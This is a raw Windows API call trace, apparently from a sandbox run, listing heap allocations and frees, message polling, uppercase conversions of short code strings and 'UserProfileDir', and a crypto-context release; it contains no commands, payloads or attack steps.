RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0248.150] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0248.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.150] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0248.151] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0248.151] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.151] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.151] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.151] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.151] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0248.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.152] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0248.152] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.152] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.152] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.153] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.153] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.153] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0248.153] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.153] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0248.153] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.153] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.153] CryptReleaseContext (hProv=0xad2720, dwFlags=0x0) returned 1 [0248.153] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.153] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.154] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.154] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.154] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.154] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0248.154] FreeLibrary (hLibModule=0x74d40000) returned 1 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.154] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.154] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.155] CloseHandle (hObject=0x1f8) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0248.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0248.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0248.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0248.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0248.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0248.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.161] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0248.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0248.162] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0248.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 